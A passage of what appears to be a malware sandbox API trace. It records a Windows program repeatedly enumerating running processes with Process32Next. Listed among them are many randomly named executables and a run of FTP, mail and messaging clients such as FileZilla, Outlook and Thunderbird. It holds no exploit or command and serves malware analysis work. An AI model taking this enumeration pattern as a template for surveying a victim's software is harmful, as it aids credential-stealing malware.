(in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0303.093] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0303.094] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0303.096] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0303.098] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0303.099] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0303.101] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.102] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0303.104] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0303.108] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0303.110] CloseHandle (hObject=0x21f8) returned 1 [0303.110] Sleep (dwMilliseconds=0x64) [0303.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1040 [0303.790] Process32First (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.793] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.796] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.798] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.800] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.801] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.803] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.805] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.806] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.808] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.809] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.891] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.893] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.894] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.896] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.898] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.899] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.903] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.905] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.906] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.908] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0303.909] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0303.911] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.913] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.915] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0303.920] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0303.923] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0303.925] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0303.926] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.928] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.929] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0303.931] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.081] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0304.082] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0304.084] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0304.086] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0304.087] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0304.095] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0304.097] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0304.099] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0304.100] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0304.102] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0304.104] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0304.110] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0304.112] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0304.113] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0304.115] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0304.117] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0304.118] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0304.125] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0304.127] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0304.128] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0304.131] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0304.133] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0304.135] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0304.327] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0304.329] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0304.331] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0304.333] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0304.336] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0304.338] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0304.344] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0304.346] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0304.349] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0304.351] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0304.353] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0304.362] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0304.364] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0304.366] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0304.368] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0304.419] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0304.421] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0304.423] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0304.425] Process32Next (in: hSnapshot=0x1040, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 